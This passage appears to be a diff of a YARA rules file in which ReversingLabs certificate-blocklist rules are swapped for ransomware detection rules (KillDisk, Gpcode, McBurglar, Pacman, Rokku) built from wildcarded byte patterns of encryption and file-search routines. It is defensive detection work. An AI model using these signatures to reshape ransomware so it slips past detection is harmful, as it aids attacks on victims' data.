-		logic_hash = "9f71de0119527c8580f9e47e3fba07242814c5a537d727d4541fd7a802b0cb86"
+		logic_hash = "6148e6fc1363ff8995a9100e07139bfa658c72892db4d30a973bad0f2b3e6c3f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "KillDisk"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 8B AC 24 ?? ?? ??
+            ?? 56 57 33 FF 8B F1 3B F7 89 7D ?? 89 7D ?? 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 95 C0 84 C0 75 ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 56 8D
+            4C 24 ?? 89 7C 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? B8 ?? ?? ?? ??
+            E9 ?? ?? ?? ?? 8B 5C 24 ?? 3B DF 8B 44 24 ?? 89 45 ?? 89 5D ?? 77 ?? 83 F8 ?? 0F 82
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 56 FF 15
+            ?? ?? ?? ?? 8B E8 3B EF 0F 84 ?? ?? ?? ?? 83 FD ?? 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ??
+            ?? 33 C0 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89 44 24 ?? 89
+            44 24 ?? 89 44 24 ?? 8D 44 24 ?? 50 6A ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 54
+            24 ?? 57 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            4C 24 ?? 51 8D 54 24 ?? 89 7C 24 ?? 52 8D BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 6A ?? 8B C6 05 ?? ?? ?? ?? 50 8B CB 83 D1 ?? 51
+            6A ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
+            ?? ?? ?? ?? 8D 4C 24 ?? 51 53 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D B4
+            24 ?? ?? ?? ?? 8D 7C 24 ?? 8D 44 24 ?? F3 A5 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 08 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24
+            ?? ?? ?? ?? 8B 50 ?? 89 94 24 ?? ?? ?? ?? 8B 48 ?? 89 8C 24 ?? ?? ?? ?? 8B 50 ?? 8D
+            74 24 ?? 89 94 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 6A ?? 53 50 55 FF 15
+            ?? ?? ?? ?? 6A ?? 8D 4C 24 ?? 51 68 ?? ?? ?? ?? 8D 54 24 ?? 52 55 C7 44 24 ?? ?? ??
+            ?? ?? FF 15 ?? ?? ?? ?? 8B F0 8B 44 24 ?? F7 DE 1B F6 83 E6 ?? 50 83 C6 ?? FF 15 ??
+            ?? ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 8B 44 24 ?? 50 BE ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? 55 FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB
+            ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 EB ?? 55 BE ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 8B C6 EB ?? BE ?? ?? ?? ?? 8B C6 EB ?? B8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E
+            5D 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3
+        }
+		$app_whitelisting_1 = {
+            81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 55 56 57 32 DB FF 15
+            ?? ?? ?? ?? 6A ?? 6A ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 8B E8 85 ED 89 6C 24 ?? 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ??
+            51 55 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 64 24 ??
+            8B 54 24 ?? 3B 54 24 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 33 FF E8 ?? ?? ?? ?? 85 C0
+            0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
+            2B C3 C1 F8 ?? 3B C7 0F 86 ?? ?? ?? ?? 3B D9 8B F3 76 ?? E8 ?? ?? ?? ?? 8B 1D ?? ??
+            ?? ?? 8B 0D ?? ?? ?? ?? 89 74 24 ?? 8D 34 BE 3B F1 B8 ?? ?? ?? ?? 8B E8 77 ?? 3B F3
+            73 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 3B 75 ?? 72 ?? E8 ?? ?? ?? ?? 8B 1D ?? ?? ??
+            ?? 8B 44 24 ?? 39 06 74 ?? B8 ?? ?? ?? ?? 83 C7 ?? E8 ?? ?? ?? ?? 3B F8 72 ?? 8B 6C
+            24 ?? 8B 74 24 ?? FF 15 ?? ?? ?? ?? 3B F0 74 ?? 85 F6 74 ?? 56 6A ?? 6A ?? FF 15 ??
+            ?? ?? ?? 8B F0 85 F6 74 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? EB ?? 8B
+            6C 24 ?? 8D 4C 24 ?? 51 55 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? B3 ?? 55 FF 15
+            ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5D 8A C3 5B 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ??
+            ?? ?? C3
+        }
+		$app_whitelisting_2 = {
+            6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 56 A1 ?? ?? ?? ?? 33 C4 50 8D 44
+            24 ?? 64 A3 ?? ?? ?? ?? 8D 44 24 ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 70 ?? C7 44
+            24 ?? ?? ?? ?? ?? 56 C7 06 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 84 C0 74 ?? 8B 36 EB
+            ?? 33 F6 6A ?? 56 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7C 24 ?? ?? 72 ?? 8B 4C 24
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 64 89 0D
+            ?? ?? ?? ?? 59 5E 83 C4 ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PORT-SERVIS LTD, TOV" and pe.signatures [ i ] . serial == "06:e8:42:d3:ea:62:49:d7:83:d6:b5:5e:29:c0:60:c7" and 1565568000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $app_whitelisting_1 and $app_whitelisting_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_06473C3C19D9E1A9429B58B6Faec2967 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gpcode : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gpcode ransomware."
 		author = "ReversingLabs"
-		id = "01eba681-8c98-5553-b369-941b6dba11e2"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "168833dd-44ab-59e1-a610-b9219b2907ff"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3544-L3560"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Gpcode.yara#L1-L67"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f9ca49ce65d213dce803806956c0ce1da0c4068bea173daae9cb06dab0a86268"
+		logic_hash = "329309873977f73a8ebe758018ebc8ba42e15c3c7cbb9a65865631d235f5bb48"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GPCode"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drive_loop = {
+            B9 19 00 00 00 BB 01 00 00 00 D3 E3 23 D8 74 ?? 80
+            C1 ?? 88 0D ?? ?? ?? ?? 80 E9 ?? C7 05 ?? ?? ?? ??
+            ?? ?? ?? ?? 50 51 E8 ?? ?? ?? ?? 59 58 49 7D
+        }
+		$encrypt_routine = {
+            FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? [0-10]
+            E9 ?? ?? ?? ?? 6A ?? [1-10] FF 75 ?? FF 35 ?? ??
+            ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 0B C0 75 ?? E9 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? [1-10] FF 35 ?? ?? ?? ??
+            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? (E8 | FF 15)
+            ?? ?? ?? ?? 0B C0 75 ?? (EB | E9) [1-4] 6A ??
+            [2-10] FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 F8 ??
+            75 ?? [10-40] FF 35 ?? ?? ?? ?? FF 75 ?? E8
+        }
+		$set_ransom_wallpaper = {
+             0F B6 05 ?? ?? ?? ?? 83 F8 01 0F 85 ?? ?? ?? ??
+             B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 51 57 [2-20] 5F
+             59 25 ?? ?? ?? ?? C1 E8 ?? 83 C0 ?? AA E2 ?? 33
+             C0 AA 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
+             ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ??
+             68 ?? ?? ?? ?? (E8 | FF 15)
+        }
+		$read_config_file = {
+            55 8B EC 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? E8 ??
+            ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? 50 6A ??
+            E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3 89 45 ?? FF
+            75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
+            89 45 ?? 50 E8 ?? ?? ?? ?? 0B C0 75 04 33 C0 C9 C3
+            89 45 ?? FF 75 ?? 6A ?? E8 ?? ?? ?? ?? 0B C0 75 04
+            33 C0 C9 C3 89 45 ?? 8B D8 FF 75 ?? FF 75 ?? FF 75
+            ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 5D ??
+            6A ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C3 ?? 8B
+            45 ?? 83 E8 ?? 50 53 E8 ?? ?? ?? ?? 8A 03 A2 ?? ??
+            ?? ?? 83 C3 ?? 8A 03 A2 ?? ?? ?? ?? 83 C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Leadership Solutions Limited" and pe.signatures [ i ] . serial == "06:47:3c:3c:19:d9:e1:a9:42:9b:58:b6:fa:ec:29:67" and 1581984001 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $drive_loop and $encrypt_routine and $set_ransom_wallpaper and $read_config_file )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_39F56251Df2088223Cc03494084E6081 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Mcburglar : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects McBurglar ransomware."
 		author = "ReversingLabs"
-		id = "0c475e89-9729-53b9-a301-7a9faa0fef91"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "11816401-87c3-5aff-b161-da0fa4eb4bca"
+		date = "2021-09-27"
+		modified = "2021-09-27"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3562-L3578"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.McBurglar.yara#L1-L75"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c87850f91758a5bb3bdf6f6d7de9a3f53077d64cebdde541ac0742d3cea4f4e0"
+		logic_hash = "57fefcdc1528fc1c8da36a431cd09774e33ea08a394ac4f8d19a27504e72676d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "McBurglar"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_env = {
+            00 7E ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ??
+            ?? 1B 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 7E ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 28 ?? ??
+            ?? ?? 00 2A
+        }
+		$encrypt_files_p1 = {
+            00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 2B ?? 73 ?? ?? ?? ?? 0B 07 12 ?? 28 ?? ?? ?? ??
+            7D ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
+            00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$encrypt_files_p2 = {
+            00 28 ?? ?? ?? ?? 0A 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 18 73 ?? ?? ?? ?? 0B 73 ?? ?? ??
+            ?? 0C 28 ?? ?? ?? ?? 03 6F ?? ?? ?? ?? 0D 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 11 ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 18 6F ?? ?? ?? ?? 00 09 06
+            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 00 11 ?? 1A 6F ?? ?? ?? ?? 00 07 06 16 06 8E 69 6F ?? ?? ?? ?? 00 07 11 ?? 6F ?? ??
+            ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ?? ?? ?? ?? 13 ?? 20 ?? ?? ?? ?? 8D ?? ?? ?? ??
+            13 ?? 00 2B ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 16 11 ?? 8E 69
+            6F ?? ?? ?? ?? 25 13 ?? 16 FE 02 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 13
+            ?? 00 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? DE
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 07 6F ?? ?? ?? ?? 00 00 DC 2A
+        }
+		$find_files = {
+            00 00 02 28 ?? ?? ?? ?? 0A 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ??
+            00 00 09 17 58 0D 09 08 8E 69 32 ?? 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 2B ?? 11
+            ?? 11 ?? 9A 13 ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 32
+            ?? 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$generate_salt = {
+            00 1F ?? 8D ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 16 0C 2B ?? 00 07 06 6F ?? ?? ?? ?? 00
+            00 08 17 58 0C 08 1F ?? FE 04 0D 09 2D ?? 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06
+            13 ?? 2B ?? 11 ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" and 1583539200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $generate_salt ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1362E56D34Dc7B501E17Fa1Ac3C3E3D9 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Pacman : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Pacman ransomware."
 		author = "ReversingLabs"
-		id = "9dccd009-eca1-5f21-b5ef-1a75f9d93c7d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "a440769b-030b-5b72-a6f2-cf478dd7acd2"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3580-L3596"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Pacman.yara#L1-L68"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0415c5a49076bab23dfc29ef2d6168b93d6bfde07a89ccb0368d2c967422407a"
+		logic_hash = "0634303a4db2631edb40a9435444f3bdc4bc6eb745c7e43a54478e54e7507403"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pacman"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$pacman_find_encrypted_1 = {
+            28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 28
+            29 02 00 06 1F 1C 28 0E 04 00 06 [0-2] 7E 13 00 00 04 20 0F 03 00 00 28 2F 00 00 06 25
+            26 28 5D 02 00 06 [0-2] 28 6D 01 00 06 [0-2] 0B 07 13 06 16 13 05 2B 31 11 06 11 05 9A
+            0C 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
+            08 28 55 02 00 06 [0-2] 26 11 05 17 D6 13 05 11 05 11 06 8E B7 32 C7 1D 45 01 00 00 00
+            F6 FF FF FF 17 2D 06 D0 1E 01 00 06 26 16 0A 38 BC 01 00 00 28 0A 00 00 06 [0-2] 6F 0D
+            00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 14 20
+            B0 0F 00 00 28 2F 00 00 06 [0-2] 1F 0A 8D 76 00 00 01 13 07 11 07 16 20 BF 0F 00 00 28
+            2F 00 00 06 [0-2] A2 11 07 17 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 18 20 C5 0F
+            00 00 28 2F 00 00 06 [0-2] A2 11 07 19 20 C8 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1A
+            20 CB 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1B 20 CE 0F 00 00 28 2F 00 00 06 [0-2] A2
+        }
+		$pacman_find_encrypted_2 = {
+            11 07 1C 20 D1 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1D 20 D4 0F 00 00 28 2F 00 00 06
+            [0-2] A2 11 07 1E 20 C2 0F 00 00 28 2F 00 00 06 [0-2] A2 11 07 1F 09 20 D7 0F 00 00 28
+            2F 00 00 06 [0-2] A2 11 07 14 14 14 28 7A 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 0D 28 07
+            00 00 06 28 1A 04 00 06 [0-2] 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06
+            [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00 06 [0-2] 28 36 05 00 06
+            [0-2] 2C 78 1A 45 01 00 00 00 F6 FF FF FF 7E 16 00 00 04 28 9D 02 00 06 [0-2] 28 0A 00
+            00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04
+            00 06 [0-2] 28 E2 05 00 06 [0-2] 09 16 28 23 01 00 06 28 0A 00 00 06 [0-2] 6F 0D 00 00
+            06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2] 06 28 AA 04 00 06 [0-2] 28 E2 05 00
+            06 [0-2] 28 66 04 00 06 DE 0F 25 28 4E 04 00 06 13 04 28 02 03 00 06 DE 00 06 17 D6 0A
+            06 28 0A 00 00 06 [0-2] 6F 0D 00 00 06 [0-2] 6F 33 00 00 06 [0-2] 28 FD 01 00 06 [0-2]
+            28 E2 04 00 06 [0-2] 3F 1B FE FF FF 1B 45 01 00 00 00 F6 FF FF FF 28 28 00 00 06 2A
+        }
+		$pacman_encrypt = {
+            28 65 02 00 06 [0-2] 0A 16 13 05 20 00 04 00 00 13 07 06 11 07 28 2A 05 00 06 [0-2] 2C
+            19 1C 45 01 00 00 00 F6 FF FF FF 17 2D 06 D0 20 01 00 06 26 11 07 13 05 2B 15 11 07 15
+            D6 13 07 11 07 17 2F D0 17 45 01 00 00 00 F6 FF FF FF 20 DA 0F 00 00 28 2F 00 00 06 [0-2]
+            11 05 28 9D 02 00 06 [0-2] 28 E2 02 00 06 [0-2] 28 6E 03 00 06 06 28 0A 03 00 06 [0-2]
+            0B 14 13 04 14 0D 1F 0E 8D 25 00 00 01 13 0B 11 0B 16 ?? 9C 11 0B 17 ?? 9C 11 0B 18
+            ?? 9C 11 0B 19 ?? 9C 11 0B 1A ?? 9C 11 0B 1B ?? 9C 11 0B 1C ?? 9C 11 0B 1D ?? 9C 11 0B
+            1E 20 ?? ?? ?? ?? 9C 11 0B 1F 09 20 ?? ?? ?? ?? 9C 11 0B 1F 0A 20 ?? ?? ?? ?? 9C 11 0B
+            1F 0B 1F ?? 9C 11 0B 1F 0C 1F ?? 9C 11 0B 1F 0D 1F ?? 9C 11 0B 13 06 02 11 06 11 05 07
+            12 04 12 03 28 1F 01 00 06 05 2C 18 18 45 01 00 00 00 F6 FF FF FF 06 11 04 09 28 96 03
+            00 06 [0-2] 0C 2B 0C 06 11 04 09 28 7E 05 00 06 [0-2] 0C 04 08 17 28 45 01 00 06 [0-2]
+            13 08 20 01 04 00 00 8D 25 00 00 01 13 09 03 11 09 16 20 00 04 00 00 28 3A 03 00 06 [0-2]
+            13 0A 11 0A 16 33 0C 1D 45 01 00 00 00 F6 FF FF FF DE 24 11 08 11 09 16 11 0A 28 F6 04
+            00 06 2B CF 11 08 2C 11 18 45 01 00 00 00 F6 FF FF FF 11 08 28 1E 03 00 06 DC DE 0C 28
+            4E 04 00 06 28 02 03 00 06 DE 00 08 28 1E 03 00 06 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO  \"Amaranth\"" and pe.signatures [ i ] . serial == "13:62:e5:6d:34:dc:7b:50:1e:17:fa:1a:c3:c3:e3:d9" and 1575936000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $pacman_find_encrypted_1 and $pacman_find_encrypted_2 and $pacman_encrypt )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4B83593Fc78D92Cfaa9Bdf3F97383964 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Rokku : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Rokku ransomware."
 		author = "ReversingLabs"
-		id = "8b5a8a8e-16f5-5098-83e5-72820f4f548a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "8722ed4a-b480-57ec-bba7-ce7d0f3704b9"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3598-L3614"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Rokku.yara#L1-L147"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "775e41fc102cbaeb9374984380b0e073de2a0075b9a200f8ab644bd1369ba015"
+		logic_hash = "fefb342f8a9afac3b40c343b830f334225ff4198d55504846aa855acf5dfc9ba"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Rokku"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Kometa" and pe.signatures [ i ] . serial == "4b:83:59:3f:c7:8d:92:cf:aa:9b:df:3f:97:38:39:64" and 1579996800 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_C7505E7464E00Ec1Dccd8D1B466D15Ff : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
